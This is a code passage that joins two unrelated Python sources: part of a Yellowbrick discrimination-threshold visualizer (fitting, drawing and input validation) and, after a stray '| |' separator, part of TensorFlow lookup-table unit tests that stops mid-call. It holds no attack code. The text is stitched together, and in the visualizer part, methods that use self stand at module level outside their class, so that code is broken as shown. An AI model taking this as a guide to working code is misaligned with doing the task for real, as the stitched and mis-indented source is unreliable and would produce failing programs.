positive class over the negative. Generally this is set to 50%, but
adjusting the discrimination threshold will adjust sensitivity to false
positives which is described by the inverse relationship of precision and
recall with respect to the threshold.
The visualizer also accounts for variability in the model by running
multiple trials with different train and test splits of the data. The
variability is visualized using a band such that the curve is drawn as the
median score of each trial and the band is from the 10th to 90th
percentile.
The visualizer is intended to help users determine an appropriate
threshold for decision making (e.g. at what threshold do we have a human
review the data), given a tolerance for precision and recall or limiting
the number of records to check (the queue rate).
.. caution:: This method only works for binary, probabilistic classifiers.
Parameters
----------
model : Classification Estimator
A binary classification estimator that implements ``predict_proba`` or
``decision_function`` methods. Will raise ``TypeError`` if the model
cannot be used with the visualizer.
ax : matplotlib Axes, default: None
The axis to plot the figure on. If None is passed in the current axes
will be used (or generated if required).
n_trials : integer, default: 50
Number of times to shuffle and split the dataset to account for noise
in the threshold metrics curves. Note if cv provides > 1 splits,
the number of trials will be n_trials * cv.get_n_splits()
cv : float or cross-validation generator, default: 0.1
Determines the splitting strategy for each trial. Possible inputs are:
- float, to specify the percent of the test split
- object to be used as cross-validation generator
This attribute is meant to give flexibility with stratified splitting
but if a splitter is provided, it should only return one split and
have shuffle set to True.
fbeta : float, 1.0 by default
The strength of recall versus precision in the F-score.
argmax : str, default: 'fscore'
Annotate the threshold maximized by the supplied metric (see exclude
for the possible metrics to use). If None, will not annotate the
graph.
exclude : str or list, optional
Specify metrics to omit from the graph, can include:
- ``"precision"``
- ``"recall"``
- ``"queue_rate"``
- ``"fscore"``
        Excluded metrics will not be displayed in the graph, nor will they
        be available in ``thresholds_``; however, they will be computed on fit.
quantiles : sequence, default: np.array([0.1, 0.5, 0.9])
Specify the quantiles to view model variability across a number of
trials. Must be monotonic and have three elements such that the first
element is the lower bound, the second is the drawn curve, and the
third is the upper bound. By default the curve is drawn at the median,
and the bounds from the 10th percentile to the 90th percentile.
random_state : int, optional
Used to seed the random state for shuffling the data while composing
different train and test splits. If supplied, the random state is
incremented in a deterministic fashion for each split.
        Note that if a splitter is provided, its random state will also be
updated with this random state, even if it was previously set.
kwargs : dict
Keyword arguments that are passed to the base visualizer class.
Attributes
----------
thresholds_ : array
The uniform thresholds identified by each of the trial runs.
cv_scores_ : dict of arrays of ``len(thresholds_)``
The values for all included metrics including the upper and lower
bounds of the metrics defined by quantiles.
Notes
-----
The term "discrimination threshold" is rare in the literature. Here, we
use it to mean the probability at which the positive class is selected
over the negative class in binary classification.
Classification models must implement either a ``decision_function`` or
``predict_proba`` method in order to be used with this class. A
``YellowbrickTypeError`` is raised otherwise.
.. seealso::
For a thorough explanation of discrimination thresholds, see:
`Visualizing Machine Learning Thresholds to Make Better Business
Decisions
<http://blog.insightdatalabs.com/visualizing-classifier-thresholds/>`_
by Insight Data.
"""
    def __init__(self, model, ax=None, n_trials=50, cv=0.1, fbeta=1.0,
                 argmax='fscore', exclude=None, quantiles=QUANTILES_MEDIAN_80,
                 random_state=None, **kwargs):
        """Initialize the visualizer, validating the model and inputs eagerly."""
        # Perform some quick type checking to help users avoid error.
        if not is_classifier(model) or not is_probabilistic(model):
            raise YellowbrickTypeError(
                "{} requires a probabilistic binary classifier".format(
                    self.__class__.__name__
                ))
        # Check the various inputs
        # (validators are defined elsewhere in this class; they raise on
        # malformed input so failures happen here rather than during fit)
        self._check_quantiles(quantiles)
        self._check_cv(cv)
        self._check_exclude(exclude)
        # Initialize the ModelVisualizer
        super(DiscriminationThreshold, self).__init__(model, ax=ax, **kwargs)
        # Set params
        self.set_params(
            n_trials=n_trials, cv=cv, fbeta=fbeta, argmax=argmax,
            exclude=exclude, quantiles=quantiles, random_state=random_state,
        )
def fit(self, X, y, **kwargs):
    """
    Fit is the entry point for the visualizer. Given instances described
    by X and binary classes described in the target y, fit performs n
    trials by shuffling and splitting the dataset then computing the
    precision, recall, f1, and queue rate scores for each trial. The
    scores are aggregated by the quantiles expressed then drawn.

    Parameters
    ----------
    X : ndarray or DataFrame of shape n x m
        A matrix of n instances with m features

    y : ndarray or Series of length n
        An array or series of target or class values. The target y must
        be a binary classification target.

    kwargs: dict
        keyword arguments passed to Scikit-Learn API.

    Returns
    -------
    self : instance
        Returns the instance of the visualizer

    raises: YellowbrickValueError
        If the target y is not a binary classification target.
    """
    # Check target before metrics raise crazy exceptions
    if type_of_target(y) != 'binary':
        raise YellowbrickValueError("multiclass format is not supported")

    # Make arrays indexable for cross validation
    X, y = indexable(X, y)

    # TODO: parallelize trials with joblib (using sklearn utility)
    # NOTE: parallelization with matplotlib is tricky at best!
    # Flatten the per-trial generator output into one list of metric dicts.
    trials = [
        metric
        for idx in range(self.n_trials)
        for metric in self._split_fit_score_trial(X, y, idx)
    ]

    # Compute maximum number of uniform thresholds across all trials
    # (the shortest curve bounds how many points every trial can supply)
    n_thresholds = np.array([len(t['thresholds']) for t in trials]).min()
    self.thresholds_ = np.linspace(0.0, 1.0, num=n_thresholds)

    # Filter metrics and collect values for uniform thresholds
    metrics = frozenset(METRICS) - self._check_exclude(self.exclude)
    uniform_metrics = defaultdict(list)

    for trial in trials:
        rows = defaultdict(list)
        for t in self.thresholds_:
            # Locate the trial threshold nearest to the uniform threshold
            # t; trial thresholds are sorted so bisect is valid here.
            idx = bisect.bisect_left(trial['thresholds'], t)
            for metric in metrics:
                rows[metric].append(trial[metric][idx])

        for metric, row in rows.items():
            uniform_metrics[metric].append(row)

    # Convert metrics to metric arrays (one row per trial)
    uniform_metrics = {
        metric: np.array(values)
        for metric, values in uniform_metrics.items()
    }

    # Perform aggregation and store cv_scores_
    quantiles = self._check_quantiles(self.quantiles)
    self.cv_scores_ = {}

    for metric, values in uniform_metrics.items():
        # Compute the lower, median, and upper plots
        lower, median, upper = mstats.mquantiles(
            values, prob=quantiles, axis=0
        )

        # Store the aggregates in cv scores
        self.cv_scores_[metric] = median
        self.cv_scores_["{}_lower".format(metric)] = lower
        self.cv_scores_["{}_upper".format(metric)] = upper

    # Draw and always return self
    self.draw()
    return self
def _split_fit_score_trial(self, X, y, idx=0):
    """
    Splits the dataset, fits a clone of the estimator, then scores it
    according to the required metrics.

    The index of the split is added to the random_state if the
    random_state is not None; this ensures that every split is shuffled
    differently but in a deterministic fashion for testing purposes.

    Parameters
    ----------
    X : indexable of shape n x m
        The feature data to split, fit, and score on.

    y : indexable of length n
        The binary target associated with X.

    idx : int, default: 0
        The trial index used to perturb the random state per trial.

    Yields
    ------
    dict
        One dict per split produced by the cv strategy, with keys
        'thresholds', 'precision', 'recall', 'fscore', and 'queue_rate'.
    """
    random_state = self.random_state
    if random_state is not None:
        # Offset the seed per trial: deterministic but distinct shuffles
        random_state += idx

    splitter = self._check_cv(self.cv, random_state)

    for train_index, test_index in splitter.split(X, y):
        # Safe indexing handles multiple types of inputs including
        # DataFrames and structured arrays - required for generic splits.
        X_train = safe_indexing(X, train_index)
        y_train = safe_indexing(y, train_index)
        X_test = safe_indexing(X, test_index)
        y_test = safe_indexing(y, test_index)

        # Fit a fresh clone so trials never share fitted state
        model = clone(self.estimator)
        model.fit(X_train, y_train)

        if hasattr(model, "predict_proba"):
            # Get the probabilities for the positive class
            y_scores = model.predict_proba(X_test)[:,1]
        else:
            # Use the decision function to get the scores
            y_scores = model.decision_function(X_test)

        # Compute the curve metrics and thresholds
        curve_metrics = precision_recall_curve(y_test, y_scores)
        precision, recall, thresholds = curve_metrics

        # Compute the F1 score from precision and recall
        # Don't need to warn for F, precision/recall would have warned
        with np.errstate(divide='ignore', invalid='ignore'):
            beta = self.fbeta ** 2
            f_score = ((1 + beta) * precision * recall /
                       (beta * precision + recall))

        # Ensure thresholds ends at 1
        thresholds = np.append(thresholds, 1)

        # Compute the queue rate: fraction of instances at/above threshold
        queue_rate = np.array([
            (y_scores >= threshold).mean()
            for threshold in thresholds
        ])

        yield {
            'thresholds': thresholds,
            'precision': precision,
            'recall': recall,
            'fscore': f_score,
            'queue_rate': queue_rate
        }
def draw(self):
    """
    Draws the cv scores as a line chart on the current axes.

    Returns
    -------
    ax : matplotlib Axes
        The axes the metric curves and bounds were drawn on.
    """
    # Set the colors from the supplied values or reasonable defaults
    color_values = resolve_colors(n_colors=4, colors=self.color)

    for idx, metric in enumerate(METRICS):
        # Skip any excluded labels
        if metric not in self.cv_scores_:
            continue

        # Get the color ensuring every metric has a static color
        color = color_values[idx]

        # Make the label pretty
        if metric == "fscore":
            if self.fbeta == 1.0:
                label = "$f_1$"
            else:
                # BUGFIX: use a raw string so "\beta" reaches matplotlib's
                # mathtext intact (in a plain string "\b" is a backspace
                # escape), and close the math environment with "$".
                label = r"$f_{{\beta={:0.1f}}}$".format(self.fbeta)
        else:
            label = metric.replace("_", " ")

        # Draw the metric values
        self.ax.plot(
            self.thresholds_, self.cv_scores_[metric],
            color=color, label=label
        )

        # Draw the upper and lower bounds
        lower = self.cv_scores_["{}_lower".format(metric)]
        upper = self.cv_scores_["{}_upper".format(metric)]

        self.ax.fill_between(
            self.thresholds_, upper, lower,
            alpha=0.35, linewidth=0, color=color
        )

        # Annotate the graph with the maximizing value
        # BUGFIX: guard against argmax=None, which is documented to mean
        # "do not annotate" but previously crashed on .lower().
        if self.argmax and self.argmax.lower() == metric:
            argmax = self.cv_scores_[metric].argmax()
            threshold = self.thresholds_[argmax]
            self.ax.axvline(
                threshold, ls='--', c='k', lw=1,
                label="$t_{}={:0.2f}$".format(metric[0], threshold)
            )

    return self.ax
def finalize(self, **kwargs):
    """
    Finalize executes any subclass-specific axes finalization steps.
    The user calls poof and poof calls finalize.

    Parameters
    ----------
    kwargs: generic keyword arguments.
    """
    super(DiscriminationThreshold, self).finalize(**kwargs)

    # Title the plot after the wrapped estimator
    self.set_title("Threshold Plot for {}".format(self.name))

    # Label the axes and pin both to the unit interval: the thresholds
    # and every plotted score are probabilities or rates in [0, 1].
    self.ax.set_xlabel('discrimination threshold')
    self.ax.set_ylabel('score')
    self.ax.set_xlim(0.0, 1.0)
    self.ax.set_ylim(0.0, 1.0)

    # Identify each metric curve in a legend
    self.ax.legend(frameon=True, loc='best')
def _check_quantiles(self, val):
    """
    Validate the quantiles passed in. Returns the np array if valid.

    Parameters
    ----------
    val : sequence of three floats
        Monotonically increasing quantiles, each strictly less than 1.

    Returns
    -------
    quantiles : np.ndarray
        The validated quantiles as a NumPy array.

    Raises
    ------
    YellowbrickValueError
        If val is not three monotonically increasing values < 1.
    """
    # BUGFIX: convert before comparing so plain Python sequences are
    # accepted as documented; ``[0.1, 0.5, 0.9] < 1`` raises a TypeError
    # on a raw list, whereas the elementwise array comparison is intended.
    arr = np.asarray(val)
    if len(arr) != 3 or not is_monotonic(arr) or not np.all(arr < 1):
        raise YellowbrickValueError(
            "quantiles must be a sequence of three "
            "monotonically increasing values less than 1"
        )
    return arr
def _check_cv(self, val, random_state=None):
    """
    Validate the cv method passed in. Returns the split strategy if no
    validation exception is raised.
    """
    # Fall back to the default 10% test split strategy
    if val is None:
        val = 0.1

    # A float is interpreted as the test_size of a single shuffle split
    if isinstance(val, float) and val <= 1.0:
        return ShuffleSplit(
            n_splits=1, test_size=val, random_state=random_state
        )

    # Otherwise accept any object implementing the scikit-learn splitter
    # protocol, seeding it with the supplied random state when possible.
    if hasattr(val, "split") and hasattr(val, "get_n_splits"):
        if random_state is not None and hasattr(val, "random_state"):
            val.random_state = random_state
        return val

    raise YellowbrickValueError(
        "'{}' is not a valid cv splitter".format(type(val))
    )
def _check_exclude(self, val):
    """
    Validate the excluded metrics. Returns the set of excluded params.
    """
    # Normalize None / single string / iterable into a lowercase frozenset
    if val is None:
        excluded = frozenset()
    elif isinstance(val, str):
        excluded = frozenset((val.lower(),))
    else:
        excluded = frozenset(s.lower() for s in val)

    # Any name outside the known metrics is a user error
    if excluded - frozenset(METRICS):
        raise YellowbrickValueError(
            "'{}' is not a valid metric to exclude".format(repr(val))
        )

    return excluded
##########################################################################
# Quick Methods
##########################################################################
def discrimination_threshold(model, X, y, ax=None, n_trials=50, cv=0.1,
                             fbeta=1.0, argmax='fscore', exclude=None,
                             quantiles=QUANTILES_MEDIAN_80, random_state=None,
                             **kwargs):
    """Quick method for DiscriminationThreshold.

    Visualizes how precision, recall, f1 score, and queue rate change as the
    discrimination threshold increases. For probabilistic, binary classifiers,
    the discrimination threshold is the probability at which you choose the
    positive class over the negative. Generally this is set to 50%, but
    adjusting the discrimination threshold will adjust sensitivity to false
    positives which is described by the inverse relationship of precision and
    recall with respect to the threshold.

    .. seealso:: See DiscriminationThreshold for more details.

    Parameters
    ----------
    model : Classification Estimator
        A binary classification estimator that implements ``predict_proba`` or
        ``decision_function`` methods. Will raise ``TypeError`` if the model
        cannot be used with the visualizer.

    X : ndarray or DataFrame of shape n x m
        A matrix of n instances with m features

    y : ndarray or Series of length n
        An array or series of target or class values. The target y must
        be a binary classification target.

    ax : matplotlib Axes, default: None
        The axis to plot the figure on. If None is passed in the current axes
        will be used (or generated if required).

    n_trials : integer, default: 50
        Number of times to shuffle and split the dataset to account for noise
        in the threshold metrics curves. Note if cv provides > 1 splits,
        the number of trials will be n_trials * cv.get_n_splits()

    cv : float or cross-validation generator, default: 0.1
        Determines the splitting strategy for each trial. Possible inputs are:

        - float, to specify the percent of the test split
        - object to be used as cross-validation generator

        This attribute is meant to give flexibility with stratified splitting
        but if a splitter is provided, it should only return one split and
        have shuffle set to True.

    fbeta : float, 1.0 by default
        The strength of recall versus precision in the F-score.

    argmax : str, default: 'fscore'
        Annotate the threshold maximized by the supplied metric (see exclude
        for the possible metrics to use). If None, will not annotate the
        graph.

    exclude : str or list, optional
        Specify metrics to omit from the graph, can include:

        - ``"precision"``
        - ``"recall"``
        - ``"queue_rate"``
        - ``"fscore"``

        Excluded metrics will not be displayed in the graph, nor will they
        be available in ``cv_scores_``; however, they will be computed on fit.

    quantiles : sequence, default: np.array([0.1, 0.5, 0.9])
        Specify the quantiles to view model variability across a number of
        trials. Must be monotonic and have three elements such that the first
        element is the lower bound, the second is the drawn curve, and the
        third is the upper bound. By default the curve is drawn at the median,
        and the bounds from the 10th percentile to the 90th percentile.

    random_state : int, optional
        Used to seed the random state for shuffling the data while composing
        different train and test splits. If supplied, the random state is
        incremented in a deterministic fashion for each split.

        Note that if a splitter is provided, its random state will also be
        updated with this random state, even if it was previously set.

    kwargs : dict
        Keyword arguments that are passed to the base visualizer class.

    Returns
    -------
    ax : matplotlib axes
        Returns the axes that the discrimination threshold curves were
        drawn on.
    """
    # Instantiate the visualizer
    visualizer = DiscriminationThreshold(
        model, ax=ax, n_trials=n_trials, cv=cv, fbeta=fbeta, argmax=argmax,
        exclude=exclude, quantiles=quantiles, random_state=random_state,
        **kwargs
    )

    # Fit and transform the visualizer (calls draw)
    visualizer.fit(X, y)
    visualizer.poof()

    # Return the axes object on the visualizer
    return visualizer.ax
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for lookup ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.platform import test
from tensorflow.python.training import server_lib
class HashTableOpTest(test.TestCase):
  """Tests for the immutable ``lookup_ops.HashTable`` op."""

  def testHashTable(self):
    """Lookup returns mapped values and the default for missing keys."""
    with self.test_session():
      default_val = -1
      keys = constant_op.constant(["brain", "salad", "surgery"])
      values = constant_op.constant([0, 1, 2], dtypes.int64)
      table = lookup_ops.HashTable(
          lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
      table.init.run()

      self.assertAllEqual(3, table.size().eval())

      input_string = constant_op.constant(["brain", "salad", "tank"])
      output = table.lookup(input_string)
      self.assertAllEqual([3], output.get_shape())

      result = output.eval()
      self.assertAllEqual([0, 1, -1], result)

  def testHashTableFindHighRank(self):
    """Lookup preserves the (higher-rank) shape of the key tensor."""
    with self.test_session():
      default_val = -1
      keys = constant_op.constant(["brain", "salad", "surgery"])
      values = constant_op.constant([0, 1, 2], dtypes.int64)
      table = lookup_ops.HashTable(
          lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
      table.init.run()

      self.assertAllEqual(3, table.size().eval())

      input_string = constant_op.constant(
          [["brain", "salad"], ["tank", "tarkus"]])
      output = table.lookup(input_string)

      result = output.eval()
      self.assertAllEqual([[0, 1], [-1, -1]], result)

  def testHashTableInitWithPythonArrays(self):
    """Plain Python lists are accepted as initializer keys and values."""
    with self.test_session():
      default_val = -1
      keys = ["brain", "salad", "surgery"]
      values = [0, 1, 2]
      table = lookup_ops.HashTable(
          lookup_ops.KeyValueTensorInitializer(
              keys, values, value_dtype=dtypes.int64), default_val)
      table.init.run()

      self.assertAllEqual(3, table.size().eval())

      input_string = constant_op.constant(["brain", "salad", "tank"])
      output = table.lookup(input_string)

      result = output.eval()
      self.assertAllEqual([0, 1, -1], result)

  def testHashTableInitWithNumPyArrays(self):
    """NumPy arrays are accepted as initializer keys and values."""
    with self.test_session():
      default_val = -1
      # BUGFIX: use the builtin ``str``; the ``np.str`` alias is deprecated
      # and was removed in NumPy 1.24, where it raises AttributeError.
      keys = np.array(["brain", "salad", "surgery"], dtype=str)
      values = np.array([0, 1, 2], dtype=np.int64)
      table = lookup_ops.HashTable(
          lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
      table.init.run()

      self.assertAllEqual(3, table.size().eval())

      input_string = constant_op.constant(["brain", "salad", "tank"])
      output = table.lookup(input_string)

      result = output.eval()
      self.assertAllEqual([0, 1, -1], result)

  def testMultipleHashTables(self):
    """Several tables coexist and are initialized by tables_initializer."""
    with self.test_session() as sess:
      default_val = -1
      keys = constant_op.constant(["brain", "salad", "surgery"])
      values = constant_op.constant([0, 1, 2], dtypes.int64)

      table1 = lookup_ops.HashTable(
          lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
      table2 = lookup_ops.HashTable(
          lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
      table3 = lookup_ops.HashTable(
          lookup_ops.KeyValueTensorInitializer(keys, values), default_val)

      lookup_ops.tables_initializer().run()
      self.assertAllEqual(3, table1.size().eval())
      self.assertAllEqual(3, table2.size().eval())
      self.assertAllEqual(3, table3.size().eval())

      input_string = constant_op.constant(["brain", "salad", "tank"])
      output1 = table1.lookup(input_string)
      output2 = table2.lookup(input_string)
      output3 = table3.lookup(input_string)

      out1, out2, out3 = sess.run([output1, output2, output3])
      self.assertAllEqual([0, 1, -1], out1)
      self.assertAllEqual([0, 1, -1], out2)
      self.assertAllEqual([0, 1, -1], out3)

  def testHashTableWithTensorDefault(self):
    """The default value may be given as a Tensor rather than a Python int."""
    with self.test_session():
      default_val = constant_op.constant(-1, dtypes.int64)
      keys = constant_op.constant(["brain", "salad", "surgery"])
      values = constant_op.constant([0, 1, 2], dtypes.int64)
      table = lookup_ops.HashTable(
          lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
      table.init.run()

      input_string = constant_op.constant(["brain", "salad", "tank"])
      output = table.lookup(input_string)

      result = output.eval()
      self.assertAllEqual([0, 1, -1], result)

  def testHashTableWithSparseTensorInput(self):
    """Looking up a SparseTensor maps its values, keeping indices/shape."""
    with self.test_session() as sess:
      default_val = constant_op.constant(-1, dtypes.int64)
      keys = constant_op.constant(["brain", "salad", "surgery"])
      values = constant_op.constant([0, 1, 2], dtypes.int64)
      table = lookup_ops.HashTable(
          lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
      table.init.run()

      sp_indices = [[0, 0], [0, 1], [1, 0]]
      sp_shape = [2, 2]
      input_tensor = sparse_tensor.SparseTensor(
          constant_op.constant(sp_indices, dtypes.int64),
          constant_op.constant(["brain", "salad", "tank"]),
          constant_op.constant(sp_shape, dtypes.int64))
      output = table.lookup(input_tensor)

      out_indices, out_values, out_shape = sess.run(output)

      self.assertAllEqual([0, 1, -1], out_values)
      self.assertAllEqual(sp_indices, out_indices)
      self.assertAllEqual(sp_shape, out_shape)

  def testSignatureMismatch(self):
    """Wrong key dtype or default-value dtype raises TypeError."""
    with self.test_session():
      default_val = -1
      keys = constant_op.constant(["brain", "salad", "surgery"])
      values = constant_op.constant([0, 1, 2], dtypes.int64)
      table = lookup_ops.HashTable(
          lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
      table.init.run()

      # Ref types do not produce a lookup signature mismatch.
      input_string = constant_op.constant([1, 2, 3], dtypes.int64)
      with self.assertRaises(TypeError):
        table.lookup(input_string)

      with self.assertRaises(TypeError):
        lookup_ops.HashTable(
            lookup_ops.KeyValueTensorInitializer(keys, values), "UNK")

  def testDTypes(self):
    """A non-dtype key_dtype argument raises TypeError."""
    with self.test_session():
      default_val = -1
      with self.assertRaises(TypeError):
        lookup_ops.HashTable(
            lookup_ops.KeyValueTensorInitializer(["a"], [1], [dtypes.string],
                                                 dtypes.int64), default_val)

  def testNotInitialized(self):
    """Lookup before running the init op fails at eval time."""
    with self.test_session():
      default_val = -1
      table = lookup_ops.HashTable(
          lookup_ops.KeyValueTensorInitializer(
              ["a"], [1], value_dtype=dtypes.int64), default_val)

      input_string = constant_op.constant(["brain", "salad", "surgery"])
      output = table.lookup(input_string)

      with self.assertRaisesOpError("Table not initialized"):
        output.eval()

  def testInitializeTwice(self):
    """Running the init op a second time raises an op error."""
    with self.test_session():
      default_val = -1
      keys = constant_op.constant(["brain", "salad", "surgery"])
      values = constant_op.constant([0, 1, 2], dtypes.int64)
      table = lookup_ops.HashTable(
          lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
      table.init.run()

      with self.assertRaisesOpError("Table already initialized"):
        table.init.run()

  def testInitializationWithInvalidDimensions(self):
    """Mismatched key/value lengths are rejected at graph-build time."""
    with self.test_session():
      default_val = -1
      keys = constant_op.constant(["brain", "salad", "surgery"])
      values = constant_op.constant([0, 1, 2, 3, 4], dtypes.int64)
      with self.assertRaises(ValueError):
        lookup_ops.HashTable(
            lookup_ops.KeyValueTensorInitializer(keys, values), default_val)

  def testMultipleSessions(self):
    """Re-initializing a shared table from a second session is a no-op."""
    # Start a server
    server = server_lib.Server(
        {
            "local0": ["localhost:0"]
        }, protocol="grpc", start=True)
    # Create two sessions sharing the same state
    session1 = session.Session(server.target)
    session2 = session.Session(server.target)

    default_val = -1
    keys = constant_op.constant(["brain", "salad", "surgery"])
    values = constant_op.constant([0, 1, 2], dtypes.int64)
    table = lookup_ops.HashTable(
        lookup_ops.KeyValueTensorInitializer(keys, values),
        default_val,
        name="t1")

    # Init the table in the first session.
    with session1:
      table.init.run()
      self.assertAllEqual(3, table.size().eval())

    # Init the table in the second session and verify that we do not get a
    # "Table already initialized" error.
    with session2:
      table.init.run()
      self.assertAllEqual(3, table.size().eval())
class IndexTableFromFile(test.TestCase):
  """Tests for ``lookup_ops.index_table_from_file`` (vocab token -> id)."""

  def _createVocabFile(self, basename, values=("brain", "salad", "surgery")):
    # Helper: write one vocab entry per line to a temp file, return its path.
    vocabulary_file = os.path.join(self.get_temp_dir(), basename)
    with open(vocabulary_file, "w") as f:
      f.write("\n".join(values) + "\n")
    return vocabulary_file

  def test_string_index_table_from_file(self):
    """In-vocab strings map to line numbers; OOV maps to the extra bucket."""
    vocabulary_file = self._createVocabFile("f2i_vocab1.txt")
    with self.test_session():
      table = lookup_ops.index_table_from_file(
          vocabulary_file=vocabulary_file, num_oov_buckets=1)
      ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))

      # Lookup before initialization must fail.
      self.assertRaises(errors_impl.OpError, ids.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((1, 2, 3), ids.eval())

  def test_string_index_table_from_multicolumn_file(self):
    """Keys come from column 0; ids come from the line number."""
    vocabulary_file = self._createVocabFile(
        "f2i_vocab1.txt", values=("brain\t300", "salad\t20", "surgery\t1"))
    with self.test_session():
      table = lookup_ops.index_table_from_file(
          vocabulary_file=vocabulary_file,
          num_oov_buckets=1,
          key_column_index=0,
          value_column_index=lookup_ops.TextFileIndex.LINE_NUMBER)
      ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))

      self.assertRaises(errors_impl.OpError, ids.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((1, 2, 3), ids.eval())

  def test_string_index_table_from_multicolumn_file_custom_delimiter(self):
    """Multicolumn vocab parsing honors a non-default column delimiter."""
    vocabulary_file = self._createVocabFile(
        "f2i_vocab1.txt", values=("brain 300", "salad 20", "surgery 1"))
    with self.test_session():
      table = lookup_ops.index_table_from_file(
          vocabulary_file=vocabulary_file,
          num_oov_buckets=1,
          key_column_index=0,
          value_column_index=lookup_ops.TextFileIndex.LINE_NUMBER,
          delimiter=" ")
      ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))

      self.assertRaises(errors_impl.OpError, ids.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((1, 2, 3), ids.eval())

  def test_string_index_table_from_file_tensor_filename(self):
    """A constant Tensor filename works and registers one asset filepath."""
    vocabulary_file = self._createVocabFile("f2i_vocab1.txt")
    with self.test_session():
      vocabulary_file = constant_op.constant(vocabulary_file)
      table = lookup_ops.index_table_from_file(
          vocabulary_file=vocabulary_file, num_oov_buckets=1)
      ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))

      self.assertRaises(errors_impl.OpError, ids.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((1, 2, 3), ids.eval())

      self.assertEqual(1,
                       len(ops.get_collection(ops.GraphKeys.ASSET_FILEPATHS)))

  def test_string_index_table_from_file_placeholder_filename(self):
    """A placeholder filename is fed at init time and adds no asset."""
    vocabulary_file = self._createVocabFile("f2i_vocab1.txt")
    with self.test_session():
      vocabulary_placeholder = array_ops.placeholder(dtypes.string, [])
      table = lookup_ops.index_table_from_file(
          vocabulary_file=vocabulary_placeholder, num_oov_buckets=1)
      ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))

      self.assertRaises(errors_impl.OpError, ids.eval)

      feed_dict = {vocabulary_placeholder.name: vocabulary_file}
      lookup_ops.tables_initializer().run(feed_dict=feed_dict)
      self.assertAllEqual((1, 2, 3), ids.eval())

      self.assertEqual(0,
                       len(ops.get_collection(ops.GraphKeys.ASSET_FILEPATHS)))

  def test_int32_index_table_from_file(self):
    """int32 keys read from file map to line numbers; OOV to the bucket."""
    vocabulary_file = self._createVocabFile(
        "f2i_vocab2.txt", values=("42", "1", "-1000"))
    with self.test_session():
      table = lookup_ops.index_table_from_file(
          vocabulary_file=vocabulary_file,
          num_oov_buckets=1,
          key_dtype=dtypes.int32)
      ids = table.lookup(
          constant_op.constant((1, -1000, 11), dtype=dtypes.int32))

      self.assertRaises(errors_impl.OpError, ids.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((1, 2, 3), ids.eval())

  def test_int64_index_table_from_file(self):
    """int64 keys read from file map to line numbers; OOV to the bucket."""
    vocabulary_file = self._createVocabFile(
        "f2i_vocab3.txt", values=("42", "1", "-1000"))
    with self.test_session():
      table = lookup_ops.index_table_from_file(
          vocabulary_file=vocabulary_file,
          num_oov_buckets=1,
          key_dtype=dtypes.int64)
      ids = table.lookup(
          constant_op.constant((1, -1000, 11), dtype=dtypes.int64))

      self.assertRaises(errors_impl.OpError, ids.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((1, 2, 3), ids.eval())

  def test_index_table_from_file_with_default_value(self):
    """Without OOV buckets, missing keys get the supplied default value."""
    default_value = -42
    vocabulary_file = self._createVocabFile("f2i_vocab4.txt")
    with self.test_session():
      table = lookup_ops.index_table_from_file(
          vocabulary_file=vocabulary_file, default_value=default_value)
      ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))

      self.assertRaises(errors_impl.OpError, ids.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((1, 2, default_value), ids.eval())

  def test_index_table_from_file_with_oov_buckets(self):
    """OOV keys are hashed into [vocab_size, vocab_size + num_oov_buckets)."""
    vocabulary_file = self._createVocabFile("f2i_vocab5.txt")
    with self.test_session():
      table = lookup_ops.index_table_from_file(
          vocabulary_file=vocabulary_file, num_oov_buckets=1000)
      ids = table.lookup(
          constant_op.constant(["salad", "surgery", "tarkus", "toccata"]))

      self.assertRaises(errors_impl.OpError, ids.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual(
          (
              1,  # From vocabulary file.
              2,  # From vocabulary file.
              867,  # 3 + fingerprint("tarkus") mod 300.
              860),  # 3 + fingerprint("toccata") mod 300.
          ids.eval())

  def test_index_table_from_file_fails_with_empty_vocabulary_file_name(self):
    """An empty-string vocabulary filename raises ValueError."""
    self.assertRaises(
        ValueError, lookup_ops.index_table_from_file, vocabulary_file="")

  def test_index_table_from_file_fails_with_empty_vocabulary(self):
    """A None vocabulary filename raises ValueError."""
    self.assertRaises(
        ValueError, lookup_ops.index_table_from_file, vocabulary_file=None)

  def test_index_table_from_file_str_fails_with_zero_size_vocabulary(self):
    """vocab_size=0 with a string filename raises a descriptive ValueError."""
    vocabulary_file = self._createVocabFile("zero_vocab_str.txt")
    self.assertRaisesRegexp(
        ValueError,
        "vocab_size must be greater than 0, got 0. "
        "vocabulary_file: .*zero_vocab_str.txt",
        lookup_ops.index_table_from_file,
